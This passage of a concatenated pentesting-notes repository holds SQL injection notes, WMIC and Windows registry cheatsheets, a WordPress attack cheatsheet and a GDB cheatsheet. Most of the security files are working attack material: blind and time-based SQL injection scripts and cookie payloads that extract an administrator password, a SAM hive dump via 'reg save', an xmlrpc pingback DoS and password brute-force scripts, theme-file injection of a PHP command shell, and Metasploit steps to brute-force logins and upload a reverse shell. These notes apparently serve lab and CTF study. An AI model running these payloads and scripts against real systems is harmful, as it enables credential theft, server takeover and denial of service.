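        sql = "SELECT id FROM tracking WHERE id = '" + tracking_id + "'"
        try:
            matched = self.db.execute(sql).fetchone() is not None
        except sqlite3.Error:
            matched = False
        return "<p>Welcome back!</p>" if matched else ""


def extract_password(target, base="abcdef", max_len=64):
    """Boolean-blind extraction: every question is answered by response length alone."""
    # FALSE condition gives the default page length, as on the page
    default_length = len(target.page(base + "' AND '1'='2"))

    def is_true(condition):
        # TRUE condition: the page grows beyond the default length
        return len(target.page(base + "' AND (" + condition + ") AND '1'='1")) > default_length

    secret = "(SELECT password FROM users WHERE username='administrator')"

    def binary_search(expr, lo, hi):
        # narrows [lo, hi] to the value v with (expr > v) false and (expr > v-1) true,
        # i.e. v == expr; each step costs exactly one request
        while lo < hi:
            mid = (lo + hi) // 2
            if is_true(f"{expr} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        return lo

    length = binary_search(f"length({secret})", 0, max_len)
    chars = []
    for i in range(1, length + 1):
        # unicode() gives the code point of the i-th character; printable ASCII is 32..126
        code = binary_search(f"unicode(substr({secret}, {i}, 1))", 32, 126)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    target = BlindTarget()
    print(extract_password(target), "recovered in", target.requests, "requests")
```

Against a real target the only change is replacing `BlindTarget.page` with an HTTP request that sends the payload in the cookie and returns the body; the comparison against `default_length` stays the same.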
| 238 | Bruteforcing data in columns 239 | Let's assume there is password column in users table 240 | 241 | ``` 242 | Cookie : TrackingID = abcdef' AND (SELECT SUBSTRING(password,$1$,1)='$a$' from users LIMIT 1)='a 243 | ``` 244 | 245 | ```python 246 | import requests 247 | letters \= \['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',\\ 248 | '1','2','3','4','5','6','7','8','9','0'\] 249 | 250 | url \= 'https://ac7f1faa1f7fa42d8008166d004a000a.web-security-academy.net/filter?category=Gifts' 251 | cookie \= 'vQiTsU5UJcK5E5a2' 252 | 253 | password \= '' 254 | 255 | for i in range(1,21): 256 | for j in letters: 257 | final\_cookie \= cookie +"'%3B(select CASE when SUBSTRING(password,{},1)='{}' THEN pg\_sleep(4) else '' end from users where username='administrator')-- -".format(i,j) 258 | full\_cookie \= {"TrackingId":final\_cookie} 259 | print("Trying {} position with {}".format(i,j)) 260 | temp \= requests.get(url,cookies\=full\_cookie) 261 | if temp.elapsed.total\_seconds()\>3: 262 | password += j 263 | print(password) 264 | break 265 | 266 | print(password) 267 | 268 | ``` 269 | 270 | --- 271 | 272 | ### Conditional Errors 273 | 274 | Sometimes there will be no difference in responses from TRUE and FALSE conditions 275 | then we need to trigger an exception and db cant hanle then we get 500 server error indicating our sql query is correct 276 | 277 | SELECT CASE 278 | ``` 279 | select case when (condition) then condition2 else condition3 end 280 | ``` 281 | 282 | ``` 283 | SELECT CASE WHEN (1=1) THEN 1/0 ELSE '' END from table 284 | ``` 285 | 286 | ``` 287 | ORACLE - TO_CHAR(1/0) 288 | PostgreSQL - cast(1/0 as text) 289 | MySQL - IF(condition,true-condition,else-condition) 290 | ``` 291 | 292 | Example : 293 | ``` 294 | Cookie : TrackingID = abcdef'+(SELECT '' from information_schema.tables LIMIT 1)+' 295 | 296 | Cookie : TrackingID = abcdef'||(SELECT '' from dual)||' 297 | 298 | ``` 299 | 300 | Bruteforcing 
tables 301 | ``` 302 | Cookie : TrackingID = abcdef'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END from $table_name$)||' 303 | ``` 304 | 305 | Bruteforcing columns 306 | ``` 307 | Cookie : TrackingID = abcdef'||(SELECT CASE WHEN(MAX(LENGTH($username$))>0) THEN TO_CHAR(1/0) ELSE '' END from users)||' 308 | ``` 309 | 310 | Bruteforcing data in columns 311 | Example : usernames 312 | ``` 313 | Cookie : TrackingID = abcdef'||(SELECT CASE WHEN (MAX(LENGTH(username))>0) THEN TO_CHAR(1/0) ELSE '' END from users where username='$administrator$' )||' 314 | ``` 315 | 316 | Bruteforcing data (passwords) 317 | ``` 318 | Cookie : TrackingID = abcdef'||(SELECT CASE WHEN (SUBSTR(password,1,1)='$a$') THEN TO_CHAR(1/0) ELSE '' END from users where username='administrator')||' 319 | ``` 320 | if we got error that means our condition is true 321 | 322 | --- 323 | 324 | ### Time Delays 325 | 326 | upto now we got errors but what if exceptions are handled correctly ? , in this case we tell db to sleep for few seconds if condition is true 327 | we should see some delay in response 328 | 329 | Different time delay techniques for different databases 330 | ``` 331 | ORACLE - dbms_pipe.recieve_message(('a'),5) 332 | PostgreSQL - pg_sleep(5) 333 | Microsoft - WAITFOR DELAY '0:0:5' 334 | MySQL - sleep(5) 335 | ``` 336 | 337 | Checking the type of database 338 | ``` 339 | Cookie : TrackingID = abcdef';(SELECT '' from information_schema.tables LIMIT 1)-- - 340 | 341 | Cookie : TrackingID = abcdef'%3B(sleep(5))-- - 342 | 343 | Cookie : TrackingID = abcdef'%3B(pg_sleep(5))-- - 344 | ``` 345 | 346 | Bruteforcing tables 347 | ``` 348 | Cookie : TrackingID = abcdef'%3B(SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE '' from $table_name$) -- - 349 | ``` 350 | 351 | Bruteforcing columns 352 | ``` 353 | Cookie : TrackingID = abcdef'%3B(SELECT CASE WHEN SUBSTRING(CONCAT('a',$username$),1,1)='a' THEN pg_sleep(5) ELSE '' from table_name) -- - 354 | ``` 355 | 356 | Bruteforcing data 357 | ``` 358 | 
Cookie : TrackingID = abcdef'%3B(SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE '' from table_name where username='$administrator$') -- -

Cookie : TrackingID = abcdef'%3B(SELECT CASE WHEN SUBSTRING(password,1,1)='$a$' THEN pg_sleep(5) ELSE '' from users where username='administrator') -- -
```

Python code to test the response delay
```python
import requests

url = 'https://<target>/filter?category=Gifts'  # placeholder: set to the target URL
r = requests.get(url)
print(r.elapsed.total_seconds())  # time from sending the request until the response arrived
```
--------------------------------------------------------------------------------
/WMIC Cheatsheet.md:
--------------------------------------------------------------------------------
# WMI Console

Tags : #wmic

WMI is Windows Management Instrumentation. It is used to retrieve information from Windows computers on the local network.

WMIC is the console edition of WMI that uses the command line; there is also PowerShell and programming-language support for WMI.

Type wmic /? to get all options available for wmic
```
wmic /?
```

---

## To know about BIOS information

```
wmic bios
```

If you want to truncate the output or only want brief information you can use `list brief`
```
wmic bios list brief
```

If we want to query a remote computer we need to specify the /node switch along with /user and /password
```
wmic /node:10.2.2.3 /user:arrow /password:arrowverse bios list brief
```

You can also select particular columns
```
wmic bios get manufacturer,name
```

You can get all available switches for a particular class using /?
```
wmic bios /?
wmic bios get /?
```

---

## Knowing about computersystem

```
wmic cpu list brief
```

To know about the manufacturer, model name, desktop name etc.
```
wmic computersystem
wmic computersystem list brief
```

To know about users of the computer
```
wmic desktop get name
```

## Knowing about disk drives and partitions

Let's view all physical hard drives connected
```
wmic diskdrive list brief
wmic diskdrive get partitions
```

Now we can see the partitions; let's get their information too
```
wmic partition list brief
```

This command gives much more information
```
wmic partition get name,size,index,type,bootable,primarypartition
```

## Knowing Environment variables

wmic environment gives all the variables and paths
```
wmic environment list brief
```

You can see the mappings of **TEMP,Path**

## Knowing Groups and users information

Let's get the users information
```
wmic useraccount list brief
```

and the groups information
```
wmic group list brief
```

## Knowing about operating system

```
wmic os
wmic os list brief
```

This command gives useful information
```
wmic os get buildnumber,buildtype,csname,countrycode,currenttimezone,lastbootuptime,manufacturer,name,numberofusers,ostype,serialnumber,version /format:list
```

--------------------------------------------------------------------------------
/Windows Registry.md:
--------------------------------------------------------------------------------
# Windows Registry

Tags : #regedit

The Registry is a hierarchical database that stores the configuration and settings of the OS, users, hardware, software, networking etc.

The Registry
is stored on the hard disk in files called **Hives**.
Whenever we boot our PC, all these Hives are loaded into memory, and so all the settings like wallpaper, appearance, networking etc. are loaded automatically.

The Registry contains **keys** and **values**;
keys can contain multiple subkeys.

There are 5 main Hives in the Registry

**HKEY_CLASSES_ROOT** (HKCR)
**HKEY_CURRENT_USER** (HKCU)
**HKEY_LOCAL_MACHINE** (HKLM)
**HKEY_USERS** (HKU)
**HKEY_CURRENT_CONFIG** (HKCC)

---

## Hives

Let's see each one of them

## HKEY_CLASSES_ROOT

This Hive contains all core components of the OS,
like drag-and-drop, copy operations, shortcuts etc.
It also contains information like **Open with**:
when you open a file with a .psd extension it automatically opens with Photoshop,
and that information is stored in this hive.

## HKEY_CURRENT_USER

This hive contains keys related to the currently logged-in user,
like the user's wallpaper, colors, cursor and all other settings.
It also contains the Control Panel settings and the software installed on the user's desktop.

The structure is as follows

![[Pasted image 20210705085515.png]]

HKCU is just a link into HKU:
if you open HKEY_USERS you can see the exact same structure under your current user's SID.

The current user's registry configuration is stored on the hard disk at the path

```
C:\Users\username\NTUSER.DAT
```

## HKEY_LOCAL_MACHINE

This hive contains all information about installed software, hardware, BIOS, security, password hashes etc.

The structure is as follows

![[Pasted image 20210705085559.png]]

These SAM, SECURITY, SYSTEM, BCD are stored in
```
C:\Windows\System32\Config
```

SAM and SECURITY are hidden even from the **administrator** user;
they are accessible only by the **SYSTEM** user.

Download psexec from the Microsoft Sysinternals suite.
Run cmd as administrator.
Now navigate to that psexec folder and execute
```
>psexec.exe -sid cmd.exe
```

A new command prompt will open with SYSTEM privileges;
in that, type
```
> regedit.exe
```
Close any regedit that is already open.

Now you will have access to SAM and SECURITY.

If we have administrator access we can dump SAM, SYSTEM and SECURITY

```
reg save hklm\sam e:\sam
```

## HKEY_USERS

This hive contains all users' information;
the keys here are the SIDs (security identifiers)
of the users.

![[Pasted image 20210705121710.png]]

The first three are built-in accounts used by services like IIS, Kerberos etc.

The remaining lengthy ones are actual users;
it does not show all users, only active users.

To know our own SID
```
whoami /all
```

## HKEY_CURRENT_CONFIG

This acts as a shortcut to
```
Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Hardware Profiles\Current
```

It stores hardware information like printers etc.

---

## Data Types

**REG_SZ** : this data type stores ordinary text (a string)

**REG_BINARY** : this data type stores raw binary data (0s and 1s), but regedit shows it to us in hex format for our convenience

**REG_DWORD** : this data type stores data in the form of 4 bytes (2 words), that is, 32 bits.
Generally it is used to store boolean values

**REG_EXPAND_SZ** : this data type stores a string like a file path; when parsed by an application it is expanded as a file path

**REG_MULTI_SZ** : this stores multiple strings as one string.
Each string is separated by a NULL byte (\x00).

--------------------------------------------------------------------------------
/Wordpress Cheatsheet.md:
--------------------------------------------------------------------------------
# Wordpress Cheatsheet

Tags : #wordpress #wpscan #xmlrpc #systemlistmethods #wpgetusersblogs #metasploit #xmlrpcdos #themeinjection #plugininjection #wp-json #wp-admin #wp-content #wp-includes

A CMS is made up of two key components:

- A Content Management Application (CMA) - the interface used to add and manage content.
- A Content Delivery Application (CDA) - the backend that takes the input entered into the CMA and assembles the code into a working, visually appealing website.

WordPress is a CMS, which means you can build a full-fledged website, including databases, with little or no coding at all.

---

## wordpress structure

```
├── index.php
├── license.txt
├── readme.html
├── wp-activate.php
├── wp-admin
├── wp-blog-header.php
├── wp-comments-post.php
├── wp-config.php
├── wp-config-sample.php
├── wp-content
├── wp-cron.php
├── wp-includes
├── wp-links-opml.php
├── wp-load.php
├── wp-login.php
├── wp-mail.php
├── wp-settings.php
├── wp-signup.php
├── wp-trackback.php
└── xmlrpc.php
```

---

## Login page

/wp-admin usually contains the login page, but it can be changed

```
/wp-admin/login.php
/wp-admin/wp-login.php
/login.php
/wp-login.php
```

---

## Enumerate Users Manually

First, manually review the posts; there you can see who posted each one.

Another method is a GET request to /wp-json/wp/v2/users

```
curl -X GET http://wordpresssite/wp-json/wp/v2/users
```

---

## XMLRPC Attacks

If WordPress has xmlrpc.php in the root directory we can execute RPC calls, which allows DDoS and authentication bruteforcing.

Construct a POST request to /xmlrpc.php
and send this as data
```
system.listMethods
```

If you see all the methods in the response, you can call those methods;
otherwise stop here and don't try to call any method, it is a waste of time.

One method is **pingback.ping**;
this can be used to DoS the machine
```python
import requests

url = "http://127.0.0.1:8080/wordpress/xmlrpc.php"
xmldata = """
pingback.ping
https://webhook.site/1b815e97-9911-484a-8ee8-0e75c608fea9/
http://127.0.0.1:8080/wordpress/
"""
r = requests.post(url, data=xmldata)
print(r.text)
```

The first string is the webhook (create a temporary one online); the second parameter is some random blog.

Now we bruteforce the username and password.
We can also use the **wp-admin** page, but there may be a limit on the number of attempts;
in that case we can use xmlrpc.php,
which has no such limit.

```python
import requests

url = "http://127.0.0.1:8080/wordpress/xmlrpc.php"
passwords = ['tech69', 'admin']
for i in range(0, len(passwords)):
    xmldata = """
wp.getUsersBlogs
admin
{}
""".format(passwords[i])
    r = requests.post(url, data=xmldata)
    #print(r.text)
    if not "Incorrect" in r.text:
        print("username:password is admin:{}".format(passwords[i]))
```

The correct response looks like this
```
E:\python>python wordpress-xmlrpc.py
isAdmin1
urlhttp://127.0.0.1:8080/wordpress/
blogid1
blogNameTech69
xmlrpchttp://127.0.0.1:8080/wordpress/xmlrpc.php
```

The above Python code gives you the password;
tweak it to read passwords and usernames from a file.

---

## WPScan

**wpscan** enumerates WordPress themes, plugins, users, backups etc.

Basic syntax
p - plugins
t - themes
u - users
```
wpscan --url http://192.168.0.102:8080/wordpress/ --enumerate p,t,u
```

We can also enumerate all plugins, all themes and all users

```
wpscan --url http://192.168.0.102:8080/wordpress/ --enumerate ap,at,u
```

During the scan wpscan identifies vulnerabilities in the found themes/plugins;
it shows us the result if they have SQLi, LFI or any other vulnerability.

We can also bruteforce users and passwords using wpscan with xmlrpc

```
wpscan --password-attack xmlrpc -U roger -P /rockyou.txt -t 25 --url http://138.68.141.81:31695
```

We get output if the password matches one from rockyou.txt
```
[!] Valid Combinations Found:
 | Username: roger, Password: lizard
```

If bruteforcing for one user did not work, try another user even if that user is not admin.

---

## Theme/Plugin Injection

Now that we have access to the WordPress dashboard,
choose any theme
and choose any PHP file like **404.php**, something nobody is likely to use.

Now inject this PHP code
```php
```

Click on update.
If the CMS gives an error like "changes were reverted, upload via SFTP", edit another theme.

Now go to that PHP file in the URL

```
http://192.168.0.102:8080/wordpress/wp-content/themes/twentysixteen/404.php?cmd=id
```

Now put any reverse shell in place of **id** and get a shell.

---

## Metasploit

Metasploit has modules for xmlrpc and WordPress

```
search wordpress xmlrpc
```

```
Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  auxiliary/dos/http/wordpress_xmlrpc_dos           2014-08-06       normal     No     Wordpress XMLRPC DoS
   1  auxiliary/scanner/http/wordpress_ghost_scanner                     normal     No     WordPress XMLRPC GHOST Vulnerability Scanner
   2  auxiliary/scanner/http/wordpress_multicall_creds                   normal     No     Wordpress XML-RPC system.multicall Credential Collector
   3  auxiliary/scanner/http/wordpress_xmlrpc_login                      normal     No     Wordpress XML-RPC Username/Password Login Scanner
   4  exploit/unix/webapp/php_xmlrpc_eval               2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution
```

Let's try bruteforcing the login

```
msf6 auxiliary(scanner/http/wordpress_xmlrpc_login) > set RHOSTS 192.168.0.102
RHOSTS => 192.168.0.102
msf6 auxiliary(scanner/http/wordpress_xmlrpc_login) > set TARGETURI /wordpress
TARGETURI => /wordpress
msf6 auxiliary(scanner/http/wordpress_xmlrpc_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf6 auxiliary(scanner/http/wordpress_xmlrpc_login) > set USERNAME admin
USERNAME => admin
msf6 auxiliary(scanner/http/wordpress_xmlrpc_login) > set PASS_FILE /home/kali/tools/wordlists/rockyou.txt
PASS_FILE => /home/kali/tools/wordlists/rockyou.txt
msf6 auxiliary(scanner/http/wordpress_xmlrpc_login) > set RPORT 8080
RPORT => 8080
msf6 auxiliary(scanner/http/wordpress_xmlrpc_login) > show options
```

Run the module.

After getting the correct password we can upload a shell using the module **exploit/unix/webapp/wp_admin_shell_upload**

```
msf6 exploit(unix/webapp/wp_admin_shell_upload) > setg RHOSTS 192.168.0.102
RHOSTS => 192.168.0.102
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RPORT 8080
RPORT => 8080
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress
TARGETURI => /wordpress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD admin
PASSWORD => admin

run
```

Now you get the reverse shell.

--------------------------------------------------------------------------------
/cheatsheet_gdb.md:
--------------------------------------------------------------------------------

# GDB Cheatsheet

# Preserve Debug Symbols

```
gcc -ggdb filename.c
```

# Loading Binary into gdb

```
gdb binary_file
```

## or

```
(gdb) file binary_file
```

# List Source Code

```
(gdb) list
```
## or list from a particular line or function

```
list 10
```

# Running Binary in GDB

```
(gdb) run
```

## with arguments

```
(gdb) run arg1 arg2 arg3
```

# Help

```
(gdb) help
```

# Extracting Symbol Table

```
objcopy --only-keep-debug binary_with_debugsymbols debug_symbols
```

# Removing Symbol Table

```
strip --strip-debug binary_file
```
## and to strip everything

```
strip --strip-debug --strip-unneeded binary_file
```

# Reading Symbol Table

## inside gdb

```
(gdb) symbol-file debug_symbols
```

## from the command line (links the stripped binary to its separate debug file)

```
objcopy --add-gnu-debuglink=debug_symbols binary_file
```

# Change syntax

## setting to intel
```
(gdb) set disassembly-flavor intel
```
## setting to at&t

```
(gdb) set disassembly-flavor att
```

# List Symbol Table from Binary

```
nm binary_file
```

# Tracing System and Library Calls

```
strace binary_file
strace -e read,write binary_file

ltrace binary_file
```

# Set Breakpoint

```
(gdb) break line_number
(gdb) break function_name
(gdb) break *address
```

# Delete Breakpoint

```
(gdb) delete breakpoint_number
```

# Getting info

```
(gdb) info functions
(gdb) info variables
(gdb) info breakpoints
(gdb) info registers
(gdb) info scope function_name   # lists the variables in that function
```

# Print values

```
(gdb) print a
(gdb) print /x $eax
```

# Examine

## syntax
```
(gdb) x/format address
```

## in more detail (count, then format letter, then unit size, with no separators)

```
(gdb) x/<count><format><unit> address
```

## display 5 bytes in hexadecimal

```
(gdb) x/5xb address
```

## display 1 word in floating point

```
(gdb) x/1fw address
```

## display 2 bytes of variable a as characters

```
(gdb) x/2cb &a
```

## display 10 instructions starting at address

```
(gdb) x/10i address
```

## display the string

```
(gdb) x/s argv[0]
```

# Disassemble functions

```
(gdb) disassemble function_name
```

# Step through the program

## step one source line, going into function calls

```
(gdb) step
```

## step one machine instruction, going into function calls

```
(gdb) stepi
```

## step exactly 5 source lines

```
(gdb) step 5
```

## step one source line, stepping over function calls

```
(gdb) next
```

## step one machine instruction, stepping over function calls

```
(gdb) nexti
```

# Setting values

## set variable or register

```
(gdb) set $eip = address
```

```
(gdb) set $eax = value
```

## setting values at an address

```
(gdb) set {data_type} address = value
(gdb) set {int} 0x12345678 = 9
```

# Call a function

```
(gdb) call function_name
```

# Continue the Program

```
(gdb) continue
```

# GDB Hooks

## hooks are user-defined commands: when there is a command 'temp' and a hook named 'hook-temp' exists, the commands in that hook are executed every time 'temp' runs

## let's say some commands should execute whenever my program stops

## show registers automatically when the program stops

```
(gdb) define hook-stop
> info registers
> x/8cb $esp
> end
```

# Continue until the current function returns

```
(gdb) finish
```

# Quit gdb

```
(gdb) quit
```

# Installing PEDA Plugin

## the peda plugin is like an automated hook that displays registers, the stack and instructions

```
git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit
```

## for other peda commands check out its github

[check here](https://github.com/longld/peda)

--------------------------------------------------------------------------------